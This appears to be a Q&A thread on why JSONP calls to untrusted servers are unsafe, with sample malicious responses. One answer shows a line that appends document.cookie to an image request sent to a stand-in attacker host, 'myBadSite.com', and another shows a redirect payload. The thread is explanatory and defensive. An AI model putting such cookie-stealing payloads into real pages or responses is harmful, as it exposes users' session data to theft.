# jQuery JSONP Security

Tags: jquery, json, security, jsonp

Am trying to convince a team that using jQuery JSONP call with a untrusted third-party might be insecure. Am using standard jQuery code:

```
$.ajax({
    url:unsecureserver+"?json_callback=?",
    dataType:'jsonp'
    success:function(data) {
        // doing processing here
    }
});
```

I need some help on what kind of insecure data to return which could cause issues; e.g. show an alert message. e.g. a JSON statement like:

```
 { "success": true } alert('hi');
```

Any suggestions what I should replace the above with so that it works with jQuery?

Comment: `{ "success": true } alert('hi');` would be a syntax error. What happens if you just use `alert('hi');` on its own? A valid jsonp response is actually JavaScript - it's _supposed_ to be just a call to the specified callback, passing an object as an argument, but...

Comment: Do you need any more help with this? If so I'll update my answer.

Answer (score 3):

JSON includes a javascript file using the script tag and the response should include a function which is named after the json_callback parameter. This means that any code can be run. With the following call:

```
$.ajax({
    url:unsecureserver+"?json_callback=callback",
    dataType:'jsonp'
    success:function(data) {
        // doing processing here
    }
});
```

The response which may contain insecure code:

```
document.write('evil content');
alert('hi');
callback({ "success": true });
```

Answer (score 2):

> need some help on what kind of insecure data to return which could
>   cause issues

I will start with this :

There is no difference between `jsonp` way of working and `<Script src='whatever'> </script>`

Now , use your imagination what are the pitfalls.

---

BAsically the third party should return something like `myCallback({"data":"1"});`

But he can also send something like : :

```
createElement('Img');
Img.src='http://myBadSite.com/ImgHandler'+document.cookie // that's where httponly is entering
```

jsonp is a data padded with method call. 
**BUT**

content type is `application/javascript;` !!!!! which means - he can run what ever he wants...

look at this sample : http://jsbin.com/IMaKUQId/3/edit

[image]

edit :

He can send you this also :

`myCallback(function (){get the sh** from this browser }());`

p.s. If you should convince him about this ,  he probably have a lot to learn.

Answer (score 1):

JSONP is not called from an `$.ajax` call, but it is included in the page like so:

```
<script src="http://external-server.example.com/getNames?callback=foo"></script>
```

Including a `<script>` tag pointing to an external domain is basically giving full trust to that domain as any script code returned will execute in the context of **your** domain, giving the external resource full access to your DOM. The script can do what it likes and access any non [Http Only](https://www.owasp.org/index.php/HttpOnly) cookie values or it could redirect the user away.

Drop in this code to your test external server:

```
document.location.href = 'http://www.google.com/';
```

and access via the script tag and the user would be directed away from your site.